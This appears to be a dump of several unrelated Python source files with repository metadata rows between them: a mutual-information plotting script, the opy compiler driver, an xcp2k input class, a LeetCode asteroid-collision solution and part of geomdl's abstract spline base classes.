fig = pylab.figure()
ax=pylab.subplot(111)
for k in range(c_sum.shape[2]):
ax.plot(y[k,:],z[k,:])
ax.set_xlabel('Number of MSNs')
#ax1.pcolor(numpy.array(z))
#pylab.colorbar()
pylab.show()
count=numpy.array(count_dic[1][5][5])
save_result_at=OUTPUT_PATH+'/main_mutual_information_convolved_raw_data.pkl'
if RUN is True:
count_conv=[]
count_conv=misc.convolve(count, bin_extent=10, kernel_type='rectangle')
misc.pickle_save([count_conv],save_result_at)
else:
count_conv= misc.pickle_load(save_result_at)
count=count_conv
save_result_at=OUTPUT_PATH+'/main_mutual_information_count_sr.pkl'
if RUN is True:
data=[]
min_data=[]
max_data=[]
for i in range(3):
data.append(numpy.array(count[i::3,:]))
min_data.append(numpy.floor(numpy.min(count[i::3,:])))
max_data.append(numpy.ceil(numpy.max(count[i::3,:])))
#data[1]=data[0]+data[1]
count_rs_list=[]
print max_data
for k in range(len(time)):
count_rs=numpy.zeros((max_data[1]+1,max_data[2]+1))
nx=range(min_data[1], max_data[1]+2)
ny=range(min_data[2], max_data[2]+2)
count_rs, xedges, yedges = numpy.histogram2d(data[1][:,k], data[2][:,k], bins=(nx, ny))
count_rs_list.append(count_rs)
misc.pickle_save([count_rs_list,data], save_result_at)
else:
count_rs_list, data=misc.pickle_load(save_result_at)
ff=misc.fano_factor(data[2])
a=numpy.ones((2,2))
b=numpy.ones((3,3))
c=numpy.array([[1,2,3],[2,1,3],[3,2,1]])
d=numpy.array([[2,1],[2,2]])
mi_test=misc.mutual_information([d,c, a,b])
mi=misc.mutual_information(count_rs_list)
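# Reference sketch (added for illustration; misc.mutual_information above is
# assumed to do something equivalent for each per-timestep count matrix):
# mutual information of one joint-count matrix,
# I(X;Y) = sum_xy p(x,y) * log2(p(x,y) / (p(x)*p(y))).
def _mi_from_counts(counts):
    p = counts / float(counts.sum())  # joint probability
    px = p.sum(axis=1, keepdims=True)  # row marginal
    py = p.sum(axis=0, keepdims=True)  # column marginal
    nz = p > 0  # skip empty bins, 0*log(0) := 0
    return float((p[nz] * numpy.log2(p[nz] / (px * py)[nz])).sum())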
max_data=[]
for i in range(3):
data.append(numpy.array(count[i::3]))
max_data.append(numpy.max(count[i::3]))
print count_rs_list[0].shape, max_data, len(count_rs_list)
pylab.figure()
pylab.plot(time, ff)
pylab.figure()
for i in range(3):
pylab.subplot(3,1,i+1)
pylab.plot(time, numpy.sum(data[i], axis=0))
print 'Simulation time', (ttime.time()-t) / 60., 'min'
pylab.show()
| [
"[email protected]"
] | |
7be3f8d94e75750a876f1605eeeddd32844a7051 | 0131d8d133725aed18f0a5838ec49878c0a85cfe | /opy/opy_main.py | 1775be52cabea2892d6e5dc6cf7990c94f7987ef | [
"Apache-2.0"
] | permissive | bysshe/oil | 0d7e853adb2aa8560832eed72daf1284955b5573 | 62cd4928c0e71f9cd254062204227a8d8cf1cb23 | refs/heads/master | 2021-01-19T23:54:01.609581 | 2017-04-17T15:58:29 | 2017-04-17T21:53:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,064 | py | #!/usr/bin/python
"""
opy_main.py
"""
from __future__ import print_function
import cStringIO
import codecs
import io
import os
import sys
import marshal
import logging
# Like oil.py, set PYTHONPATH internally? So symlinks work?
# Actually '.' is implicitly in PYTHONPATH, so we don't need it.
# If we were in bin/oil.py, then we would need this.
#this_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
#sys.path.append(os.path.join(this_dir))
from pgen2 import driver, pgen, grammar
from pgen2 import token, tokenize
import pytree
from compiler2 import transformer
from compiler2 import pycodegen
from compiler2 import opcode
from byterun import execfile
from util_opy import log
# From lib2to3/pygram.py. This takes the place of the 'symbol' module.
# compiler/transformer module needs this.
class Symbols(object):
def __init__(self, gr):
"""Initializer.
Creates an attribute for each grammar symbol (nonterminal),
whose value is the symbol's type (an int >= 256).
"""
for name, symbol in gr.symbol2number.items():
setattr(self, name, symbol)
#log('%s -> %d' % (name, symbol))
# For transformer to use
self.number2symbol = gr.number2symbol
#assert 0
def HostStdlibNames():
import symbol
import token
names = {}
for k, v in symbol.sym_name.items():
names[k] = v
for k, v in token.tok_name.items():
names[k] = v
return names
def _newer(a, b):
"""Inquire whether file a was written since file b."""
if not os.path.exists(a):
return False
if not os.path.exists(b):
return True
return os.path.getmtime(a) >= os.path.getmtime(b)
def _generate_pickle_name(gt):
head, tail = os.path.splitext(gt)
if tail == ".txt":
tail = ""
return head + tail + ".".join(map(str, sys.version_info)) + ".pickle"
def load_grammar(gt="Grammar.txt", gp=None,
save=True, force=False, logger=None):
"""Load the grammar (maybe from a pickle)."""
if logger is None:
logger = logging.getLogger()
gp = _generate_pickle_name(gt) if gp is None else gp
if force or not _newer(gp, gt):
logger.info("Generating grammar tables from %s", gt)
g = pgen.generate_grammar(gt)
if save:
logger.info("Writing grammar tables to %s", gp)
try:
# calls pickle.dump on self.__dict__ after making it deterministic
g.dump(gp)
except OSError as e:
logger.info("Writing failed: %s", e)
else:
g = grammar.Grammar()
g.load(gp) # pickle.load()
return g
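# Cache behavior sketch (version digits illustrative): for gt='Grammar.txt'
# the pickle lands next to it, e.g. 'Grammar2.7.13.final.0.pickle', and is
# regenerated only when the .txt file is newer than the pickle (see _newer).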
_READ_SOURCE_AS_UNICODE = True
# Not sure why this doesn't work? It should be more like what the compiler
# module expected.
#_READ_SOURCE_AS_UNICODE = False
# Emulate the interface that Transformer expects from parsermodule.c.
class Pgen2PythonParser:
def __init__(self, driver, start_symbol):
self.driver = driver
self.start_symbol = start_symbol
def suite(self, text):
# Python 3
#f = io.StringIO(text)
f = cStringIO.StringIO(text)
tokens = tokenize.generate_tokens(f.readline)
tree = self.driver.parse_tokens(tokens, start_symbol=self.start_symbol)
return tree
def CountTupleTree(tu):
"""Count the nodes in a tuple parse tree."""
if isinstance(tu, tuple):
s = 0
for entry in tu:
s += CountTupleTree(entry)
return s
elif isinstance(tu, int):
return 1
elif isinstance(tu, str):
return 1
else:
raise AssertionError(tu)
class TupleTreePrinter:
def __init__(self, names):
self._names = names
def Print(self, tu, f=sys.stdout, indent=0):
ind = ' ' * indent
f.write(ind)
if isinstance(tu, tuple):
f.write(self._names[tu[0]])
f.write('\n')
for entry in tu[1:]:
self.Print(entry, f, indent=indent+1)
elif isinstance(tu, int):
f.write(str(tu))
f.write('\n')
elif isinstance(tu, str):
f.write(str(tu))
f.write('\n')
else:
raise AssertionError(tu)
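# Small self-check (hypothetical node, not from a real parse): leaves are
# (type, value, lineno, column) tuples, so every int and str counts as one
# node -- the outer type plus the four leaf fields below gives 5.
assert CountTupleTree((257, (1, 'def', 1, 0))) == 5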
def main(argv):
grammar_path = argv[1]
# NOTE: This is cached as a pickle
gr = load_grammar(grammar_path)
FILE_INPUT = gr.symbol2number['file_input']
symbols = Symbols(gr)
pytree.Init(symbols) # for type_repr() pretty printing
transformer.Init(symbols) # for _names and other dicts
# In Python 2 code, always use from __future__ import print_function.
try:
del gr.keywords["print"]
except KeyError:
pass
#do_glue = False
do_glue = True
if do_glue: # Make it a flag
# Emulating parser.st structures from parsermodule.c.
# They have a totuple() method, which outputs tuples like this.
def py2st(gr, raw_node):
type, value, context, children = raw_node
# See pytree.Leaf
if context:
_, (lineno, column) = context
else:
lineno = 0 # default in Leaf
column = 0
if children:
return (type,) + tuple(children)
else:
return (type, value, lineno, column)
convert = py2st
else:
convert = pytree.convert
dr = driver.Driver(gr, convert=convert)
action = argv[2]
if action == 'stdlib-parse':
# This is what the compiler/ package was written against.
import parser
py_path = argv[3]
with open(py_path) as f:
st = parser.suite(f.read())
tree = st.totuple()
n = transformer.CountTupleTree(tree)
log('COUNT %d', n)
printer = TupleTreePrinter(HostStdlibNames())
printer.Print(tree)
elif action == 'parse':
py_path = argv[3]
with open(py_path) as f:
tokens = tokenize.generate_tokens(f.readline)
tree = dr.parse_tokens(tokens, start_symbol=FILE_INPUT)
if isinstance(tree, tuple):
n = CountTupleTree(tree)
log('COUNT %d', n)
printer = TupleTreePrinter(transformer._names)
printer.Print(tree)
else:
tree.PrettyPrint(sys.stdout)
log('\tChildren: %d' % len(tree.children), file=sys.stderr)
elif action == 'old-compile':
py_path = argv[3]
out_path = argv[4]
if do_glue:
py_parser = Pgen2PythonParser(dr, FILE_INPUT)
printer = TupleTreePrinter(transformer._names)
tr = transformer.Pgen2Transformer(py_parser, printer)
else:
tr = transformer.Transformer()
# for Python 2.7 compatibility:
if _READ_SOURCE_AS_UNICODE:
f = codecs.open(py_path, encoding='utf-8')
else:
f = open(py_path)
contents = f.read()
co = pycodegen.compile(contents, py_path, 'exec', transformer=tr)
log("Code length: %d", len(co.co_code))
# Write the .pyc file
with open(out_path, 'wb') as out_f:
h = pycodegen.getPycHeader(py_path)
out_f.write(h)
marshal.dump(co, out_f)
elif action == 'compile':
# 'opy compile' is pgen2 + compiler2
# TODO: import compiler2
#raise NotImplementedError
py_path = argv[3]
out_path = argv[4]
if do_glue:
py_parser = Pgen2PythonParser(dr, FILE_INPUT)
printer = TupleTreePrinter(transformer._names)
tr = transformer.Pgen2Transformer(py_parser, printer)
else:
tr = transformer.Transformer()
with open(py_path) as f:
contents = f.read()
co = pycodegen.compile(contents, py_path, 'exec', transformer=tr)
log("Code length: %d", len(co.co_code))
# Write the .pyc file
with open(out_path, 'wb') as out_f:
h = pycodegen.getPycHeader(py_path)
out_f.write(h)
marshal.dump(co, out_f)
elif action == 'compile2':
in_path = argv[3]
out_path = argv[4]
from compiler2 import pycodegen as pycodegen2
from misc import stdlib_compile
stdlib_compile.compileAndWrite(in_path, out_path, pycodegen2.compile)
elif action == 'run':
# TODO: Add an option like -v in __main__
#level = logging.DEBUG if args.verbose else logging.WARNING
#logging.basicConfig(level=level)
#logging.basicConfig(level=logging.DEBUG)
# Compile and run, without writing pyc file
py_path = argv[3]
opy_argv = argv[3:]
if py_path.endswith('.py'):
py_parser = Pgen2PythonParser(dr, FILE_INPUT)
printer = TupleTreePrinter(transformer._names)
tr = transformer.Pgen2Transformer(py_parser, printer)
with open(py_path) as f:
contents = f.read()
co = pycodegen.compile(contents, py_path, 'exec', transformer=tr)
execfile.run_code_object(co, opy_argv)
elif py_path.endswith('.pyc') or py_path.endswith('.opyc'):
with open(py_path) as f:
f.seek(8) # past header. TODO: validate it!
co = marshal.load(f)
execfile.run_code_object(co, opy_argv)
else:
raise RuntimeError('Invalid path %r' % py_path)
else:
raise RuntimeError('Invalid action %r' % action)
# Examples of nodes Leaf(type, value):
# Leaf(1, 'def')
# Leaf(4, '\n')
# Leaf(8, ')')
# Oh are these just tokens?
# yes.
# Node(prefix, children)
if __name__ == '__main__':
try:
main(sys.argv)
except RuntimeError as e:
log('FATAL: %s', e)
sys.exit(1)
| [
"[email protected]"
] | |
28cd2ba0f453c1e05fbe64bea3586c73a9f79d23 | f3bd271bf00325881fb5b2533b9ef7f7448a75ec | /xcp2k/classes/_ic1.py | dfa06f08d6b858b4ef14780d7a8e80c0a989bcb7 | [] | no_license | obaica/xcp2k | 7f99fc9d494859e16b9b0ea8e217b0493f4b2f59 | 6e15c2c95658f545102595dc1783f5e03a9e6916 | refs/heads/master | 2020-07-15T17:27:43.378835 | 2019-02-11T16:32:24 | 2019-02-11T16:32:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | from xcp2k.inputsection import InputSection
class _ic1(InputSection):
def __init__(self):
InputSection.__init__(self)
self.Print_ic_list = None
self.Eps_dist = None
self.Optimize_homo_lumo = None
self.Gw_eigenvalues = None
self.Gw_eigenvalues_beta = None
self._name = "IC"
self._keywords = {'Optimize_homo_lumo': 'OPTIMIZE_HOMO_LUMO', 'Gw_eigenvalues': 'GW_EIGENVALUES', 'Eps_dist': 'EPS_DIST', 'Print_ic_list': 'PRINT_IC_LIST', 'Gw_eigenvalues_beta': 'GW_EIGENVALUES_BETA'}
self._aliases = {'Optimize': 'Optimize_homo_lumo'}
@property
def Optimize(self):
"""
See documentation for Optimize_homo_lumo
"""
return self.Optimize_homo_lumo
@Optimize.setter
def Optimize(self, value):
self.Optimize_homo_lumo = value
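# Hypothetical usage sketch (values illustrative): attribute names map to
# CP2K keywords through self._keywords, and Optimize is an alias property,
# e.g. ic = _ic1(); ic.Eps_dist = 1e-4; ic.Optimize = True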
| [
"[email protected]"
] | |
5f7c905b69a5173153cc985d9e73093dceb5a83f | 5c531de5e4759c904e608b4fc653b2b041f79a0e | /Amazon_735. Asteroid Collision.py | 6737b4cae3d0689e2f94c48aac92eb951b2c6267 | [] | no_license | jianhui-ben/leetcode_python | 133c7e6e5c7316d00607ba2e327239e002de28b2 | fcc16124cc24a5993e27f5d97e78d8f290e68230 | refs/heads/master | 2022-06-05T22:32:18.034581 | 2022-05-17T02:27:11 | 2022-05-17T02:27:11 | 250,683,308 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,407 | py | #735. Asteroid Collision
#We are given an array asteroids of integers representing asteroids in a row.
#For each asteroid, the absolute value represents its size, and the sign represents
#its direction (positive meaning right, negative meaning left). Each asteroid moves
#at the same speed.
#Find out the state of the asteroids after all collisions. If two asteroids meet,
#the smaller one will explode. If both are the same size, both will explode. Two
#asteroids moving in the same direction will never meet.
#Example 1:
#Input: asteroids = [5,10,-5]
#Output: [5,10]
#Explanation: The 10 and -5 collide resulting in 10. The 5 and 10 never collide.
#Example 2:
#Input: asteroids = [8,-8]
#Output: []
#Explanation: The 8 and -8 collide exploding each other.
from typing import List
class Solution:
def asteroidCollision(self, asteroids: List[int]) -> List[int]:
##better method:
out=[]
for star in asteroids:
while out and out[-1]>0 and star<0:
if abs(out[-1])>abs(star):
break
elif abs(out[-1])<abs(star):
out.pop()
elif abs(out[-1])==abs(star):
out.pop()
break
else:
out.append(star)
return out
# ##Ben's method
# positive=False
# temp=[]
# add_negative=True
# for i in range(len(asteroids)):
# if asteroids[i] < 0 and not positive:
# temp.append(asteroids[i])
# elif asteroids[i]>=0:
# positive=True
# temp.append(asteroids[i])
# elif asteroids[i]<0 and positive:
# while len(temp)>0 and temp[-1]>0:
# last_positive=temp.pop()
# if last_positive+ asteroids[i]>0:
# temp.append(last_positive)
# break
# elif last_positive+ asteroids[i]==0:
# add_negative=False
# break
# if (len(temp)==0 or temp[-1]<=0) and add_negative: temp.append(asteroids[i])
# add_negative=True
# if not temp: positive=False
# else: positive= temp[-1]>=0
# add_negative=True
# return temp
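# Quick self-check (added for illustration) against the worked examples in
# the problem statement above.
if __name__ == '__main__':
    s = Solution()
    assert s.asteroidCollision([5, 10, -5]) == [5, 10]
    assert s.asteroidCollision([8, -8]) == []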
| [
"[email protected]"
] | |
4b6a65ee5967997a435363f289387f57cd5f8fef | 36dbd31536a4084db83d12b2bd12a9f22f4da636 | /geomdl/abstract.py | 614834b2701d5c774f0342a7c385090e5edb4f75 | [
"Python-2.0",
"MIT"
] | permissive | Hgser/NURBS-Python | 75d38a21721d9afd3d5f8491bf8ba56d71a2285a | ced4debdf4fc13afce9b830a2962da2789e5c45b | refs/heads/master | 2020-04-27T00:42:17.632484 | 2019-02-28T05:21:20 | 2019-02-28T05:21:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 103,171 | py | """
.. module:: abstract
:platform: Unix, Windows
:synopsis: Provides abstract base classes for parametric shapes
.. moduleauthor:: Onur Rauf Bingol <[email protected]>
"""
import copy
import abc
import six
import warnings
from .evaluators import AbstractEvaluator
from .tessellate import AbstractTessellate
from . import vis
from . import helpers
from . import utilities
from . import voxelize
from .exceptions import GeomdlException
@six.add_metaclass(abc.ABCMeta)
class Geometry(object):
""" Abstract base class for defining geometry elements.
This class provides the following properties:
* :py:attr:`name`
* :py:attr:`evalpts`
**Keyword Arguments:**
* ``precision``: number of decimal places to round to. *Default: 18*
"""
def __init__(self, **kwargs):
self._precision = int(kwargs.get('precision', 18)) # number of decimal places to round to
self._array_type = list if not hasattr(self, '_array_type') else self._array_type
self._eval_points = self._init_array() # evaluated points
self._name = "Geometry object" # descriptor field
self._iter_index = 0 # iterator index
self._cache = {} # cache dictionary
def __iter__(self):
self._iter_index = 0
return self
def next(self):
return self.__next__()
def __next__(self):
if self._iter_index > 0:
raise StopIteration
self._iter_index += 1
return self
def __len__(self):
return 1
def __copy__(self):
cls = self.__class__
result = cls.__new__(cls)
result.__dict__.update(self.__dict__)
return result
def __deepcopy__(self, memo):
# Don't copy self reference
cls = self.__class__
result = cls.__new__(cls)
memo[id(self)] = result
# Don't copy the cache
memo[id(self._cache)] = self._cache.__new__(dict)
# Copy all other attributes
for k, v in self.__dict__.items():
setattr(result, k, copy.deepcopy(v, memo))
return result
def __str__(self):
return self.name
__repr__ = __str__
def _init_array(self):
""" Initializes the arrays. """
if callable(self._array_type):
return self._array_type()
return list()
@property
def name(self):
""" Descriptor field for storing the shape identification data, such as names, ID numbers, etc.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the descriptor
:setter: Sets the descriptor
:type: str
"""
return self._name
@name.setter
def name(self, value):
self._name = value
@property
def evalpts(self):
""" Evaluated points.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the coordinates of the evaluated points
:type: list
"""
if self._eval_points is None or len(self._eval_points) == 0:
self.evaluate()
return self._eval_points
@abc.abstractmethod
def evaluate(self, **kwargs):
""" Abstract method for the implementation of evaluation algorithm.
.. note::
This is an abstract method and it must be implemented in the subclass.
"""
pass
@six.add_metaclass(abc.ABCMeta)
class SplineGeometry(Geometry):
""" Abstract base class for defining spline geometries.
This class provides the following properties:
* :py:attr:`name`
* :py:attr:`rational`
* :py:attr:`dimension`
* :py:attr:`pdimension`
* :py:attr:`degree`
* :py:attr:`knotvector`
* :py:attr:`ctrlpts`
* :py:attr:`ctrlpts_size`
* :py:attr:`weights` (for completeness with the rational spline implementations)
* :py:attr:`evalpts`
* :py:attr:`bbox`
* :py:attr:`evaluator`
* :py:attr:`vis`
**Keyword Arguments:**
* ``precision``: number of decimal places to round to. *Default: 18*
* ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True*
* ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear`
"""
def __init__(self, **kwargs):
super(SplineGeometry, self).__init__(**kwargs)
self._pdim = 0 if not hasattr(self, '_pdim') else self._pdim # parametric dimension
self._dinit = 0.1 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value
self._rational = False # defines whether the B-spline object is rational or not
self._dimension = 0 # spatial dimension
self._degree = [0 for _ in range(self._pdim)] # degree
self._knot_vector = [self._init_array() for _ in range(self._pdim)] # knot vector
self._control_points = self._init_array() # control points
self._control_points_size = [0 for _ in range(self._pdim)] # control points length
self._delta = [self._dinit for _ in range(self._pdim)] # evaluation delta
self._bounding_box = self._init_array() # bounding box
self._evaluator = None # evaluator instance
self._vis_component = None # visualization component
self._span_func = kwargs.get('find_span_func', helpers.find_span_linear) # default "find_span" function
self._kv_normalize = kwargs.get('normalize_kv', True) # flag to control knot vector normalization
@property
def rational(self):
""" Defines the rational and non-rational B-spline shapes.
Rational shapes use homogeneous coordinates which includes a weight alongside with the Cartesian coordinates.
Rational B-splines are also named as NURBS (Non-uniform rational basis spline) and non-rational B-splines are
sometimes named as NUBS (Non-uniform basis spline) or directly as B-splines.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
        :getter: Returns True if the B-spline object is rational (NURBS)
:type: bool
"""
return self._rational
@property
def dimension(self):
""" Spatial dimension.
Spatial dimension will be automatically estimated from the first element of the control points array.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the spatial dimension, e.g. 2D, 3D, etc.
:type: int
"""
if self._rational:
return self._dimension - 1
return self._dimension
@property
def pdimension(self):
""" Parametric dimension.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the parametric dimension
:type: int
"""
return self._pdim
@property
def degree(self):
""" Degree
:getter: Gets the degree
:setter: Sets the degree
:type: list
"""
return self._degree
@degree.setter
def degree(self, value):
self._degree = value
@property
def knotvector(self):
""" Knot vector
:getter: Gets the knot vector
:setter: Sets the knot vector
:type: list
"""
return self._knot_vector
@knotvector.setter
def knotvector(self, value):
self._knot_vector = value
@property
def ctrlpts(self):
""" Control points.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the control points
:setter: Sets the control points
:type: list
"""
return self._control_points
@ctrlpts.setter
def ctrlpts(self, value):
self._control_points = value
@property
def ctrlpts_size(self):
""" Total number of control points.
:getter: Gets the total number of control points
:type: int
"""
res = 1
for sz in self._control_points_size:
res *= sz
return res
@property
def weights(self):
""" Weights.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the weights
:setter: Sets the weights
"""
return None
@weights.setter
def weights(self, value):
pass
@property
def domain(self):
""" Domain.
Domain is determined using the knot vector(s).
:getter: Gets the domain
"""
retval = []
for idx, kv in enumerate(self._knot_vector):
retval.append((kv[self._degree[idx]], kv[-(self._degree[idx] + 1)]))
return retval[0] if self._pdim == 1 else retval
@property
def range(self):
""" Domain range.
:getter: Gets the range
"""
retval = []
for idx, kv in enumerate(self._knot_vector):
            retval.append(kv[-(self._degree[idx] + 1)] - kv[self._degree[idx]])
return retval[0] if self._pdim == 1 else retval
@property
def bbox(self):
""" Bounding box.
Evaluates the bounding box and returns the minimum and maximum coordinates.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the bounding box
:type: tuple
"""
if self._bounding_box is None or len(self._bounding_box) == 0:
self._bounding_box = utilities.evaluate_bounding_box(self.ctrlpts)
return self._bounding_box
@property
def evaluator(self):
""" Evaluator instance.
Evaluators allow users to use different algorithms for B-Spline and NURBS evaluations. Please see the
documentation on ``Evaluator`` classes.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the current Evaluator instance
:setter: Sets the Evaluator instance
:type: evaluators.AbstractEvaluator
"""
return self._evaluator
@evaluator.setter
def evaluator(self, value):
if not isinstance(value, AbstractEvaluator):
raise TypeError("The evaluator must be an instance of AbstractEvaluator")
value._span_func = self._span_func
self._evaluator = value
@property
def vis(self):
""" Visualization component.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the visualization component
:setter: Sets the visualization component
:type: vis.VisAbstract
"""
return self._vis_component
@vis.setter
def vis(self, value):
if not isinstance(value, vis.VisAbstract):
warnings.warn("Visualization component is NOT an instance of VisAbstract class")
return
self._vis_component = value
def set_ctrlpts(self, ctrlpts, *args, **kwargs):
""" Sets control points and checks if the data is consistent.
This method is designed to provide a consistent way to set control points whether they are weighted or not.
It directly sets the control points member of the class, and therefore it doesn't return any values.
The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates
will be an array of 3 elements representing *(x, y, z)* coordinates.
Keyword Arguments:
* ``array_init``: initializes the control points array in the instance
* ``array_check_for``: defines the types for input validation
* ``callback``: defines the callback function for processing input points
* ``dimension``: defines the spatial dimension of the input points
:param ctrlpts: input control points as a list of coordinates
:type ctrlpts: list
:param args: number of control points corresponding to each parametric dimension
:type args: tuple
"""
def validate_and_clean(pts_in, check_for, dimension, pts_out, **kws):
for idx, cpt in enumerate(pts_in):
if not isinstance(cpt, check_for):
raise ValueError("Element number " + str(idx) + " is not a valid input")
if len(cpt) != dimension:
raise ValueError("The input must be " + str(self._dimension) + " dimensional list - " + str(cpt) +
" is not a valid control point")
# Convert to list of floats
pts_out[idx] = [float(coord) for coord in cpt]
return pts_out
# Argument validation
if len(args) == 0:
args = [len(ctrlpts)]
if len(args) != self._pdim:
raise ValueError("Number of arguments after ctrlpts must be " + str(self._pdim))
# Keyword arguments
array_init = kwargs.get('array_init', [[] for _ in range(len(ctrlpts))])
array_check_for = kwargs.get('array_check_for', (list, tuple))
callback_func = kwargs.get('callback', validate_and_clean)
self._dimension = kwargs.get('dimension', len(ctrlpts[0]))
# Pop existing keywords from kwargs dict
existing_kws = ['array_init', 'array_check_for', 'callback', 'dimension']
for ekw in existing_kws:
if ekw in kwargs:
kwargs.pop(ekw)
# Set control points and sizes
self._control_points = callback_func(ctrlpts, array_check_for, self._dimension, array_init, **kwargs)
self._control_points_size = [int(arg) for arg in args]
@abc.abstractmethod
def render(self, **kwargs):
""" Abstract method for spline rendering and visualization.
.. note::
This is an abstract method and it must be implemented in the subclass.
"""
pass
@six.add_metaclass(abc.ABCMeta)
class Curve(SplineGeometry):
""" Abstract base class for defining spline curves.
Curve ABC is inherited from abc.ABCMeta class which is included in Python standard library by default. Due to
differences between Python 2 and 3 on defining a metaclass, the compatibility module ``six`` is employed. Using
``six`` to set metaclass allows users to use the abstract classes in a correct way.
The abstract base classes in this module are implemented using a feature called Python Properties. This feature
allows users to use some of the functions as if they are class fields. You can also consider properties as a
pythonic way to set getters and setters. You will see "getter" and "setter" descriptions on the documentation of
these properties.
The Curve ABC allows users to set the *FindSpan* function to be used in evaluations with ``find_span_func`` keyword
as an input to the class constructor. NURBS-Python includes a binary and a linear search variation of the FindSpan
function in the ``helpers`` module.
You may also implement and use your own *FindSpan* function. Please see the ``helpers`` module for details.
Code segment below illustrates a possible implementation of Curve abstract base class:
.. code-block:: python
:linenos:
from geomdl import abstract
class MyCurveClass(abstract.Curve):
def __init__(self, **kwargs):
super(MyCurveClass, self).__init__(**kwargs)
# Add your constructor code here
def evaluate(self, **kwargs):
# Implement this function
pass
def evaluate_single(self, uv):
# Implement this function
pass
def evaluate_list(self, uv_list):
# Implement this function
pass
def derivatives(self, u, v, order, **kwargs):
# Implement this function
pass
The properties and functions defined in the abstract base class will be automatically available in the subclasses.
**Keyword Arguments:**
* ``precision``: number of decimal places to round to. *Default: 18*
* ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True*
* ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear`
"""
def __init__(self, **kwargs):
self._pdim = 1 if not hasattr(self, '_pdim') else self._pdim # number of parametric directions
self._dinit = 0.01 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value
self._array_type = list if not hasattr(self, '_array_type') else self._array_type
super(Curve, self).__init__(**kwargs) # Call parent function
self._name = "Curve" # descriptor field
@property
def order(self):
""" Order.
Defined as ``order = degree + 1``
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the order
:setter: Sets the order
:type: int
"""
return self.degree + 1
@order.setter
def order(self, value):
self.degree = value - 1
@property
def degree(self):
""" Degree.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the degree
:setter: Sets the degree
:type: int
"""
return self._degree[0]
@degree.setter
def degree(self, value):
val = int(value)
if val < 0:
raise ValueError("Degree cannot be less than zero")
# Clean up the curve points list
self.reset(evalpts=True)
# Set degree
self._degree[0] = val
@property
def knotvector(self):
""" Knot vector.
The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True``
argument.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the knot vector
:setter: Sets the knot vector
:type: list
"""
return self._knot_vector[0]
@knotvector.setter
def knotvector(self, value):
if self.degree == 0 or self._control_points is None or len(self._control_points) == 0:
raise ValueError("Set degree and control points first")
# Check knot vector validity
if not utilities.check_knot_vector(self.degree, value, len(self._control_points)):
raise ValueError("Input is not a valid knot vector")
# Clean up the curve points lists
self.reset(evalpts=True)
# Set knot vector
self._knot_vector[0] = utilities.normalize_knot_vector(value, decimals=self._precision) \
if self._kv_normalize else value
@property
def ctrlpts(self):
""" Control points.
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets the control points
:setter: Sets the control points
:type: list
"""
return self._control_points
@ctrlpts.setter
def ctrlpts(self, value):
self.set_ctrlpts(value)
@property
def sample_size(self):
""" Sample size.
Sample size defines the number of evaluated points to generate. It also sets the ``delta`` property.
The following figure illustrates the working principles of sample size property:
.. math::
\\underbrace {\\left[ {{u_{start}}, \\ldots ,{u_{end}}} \\right]}_{{n_{sample}}}
Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details
on using this class member.
:getter: Gets sample size
:setter: Sets sample size
:type: int
"""
return int(1.0 / self.delta) + 1
@sample_size.setter
def sample_size(self, value):
if not isinstance(value, int):
raise ValueError("Sample size must be an integer value")
if self.knotvector is None or len(self.knotvector) == 0 or self.degree == 0:
warnings.warn("Cannot determine the delta value. Please set knot vector and degree before sample size.")
return
# To make it operate like linspace, we have to know the starting and ending points.
start = self.knotvector[self.degree]
stop = self.knotvector[-(self.degree+1)]
# Set delta value
self.delta = (stop - start) / float(value - 1)
@property
def delta(self):
""" Evaluation delta.
Evaluation delta corresponds to the *step size* while ``evaluate`` function iterates on the knot vector to
generate curve points. Decreasing step size results in generation of more curve points.
        Therefore, the smaller the delta value, the smoother the curve.
The following figure illustrates the working principles of the delta property:
.. math::
\\left[{{u_{start}},{u_{start}} + \\delta ,({u_{start}} + \\delta ) + \\delta , \\ldots ,{u_{end}}} \\right]
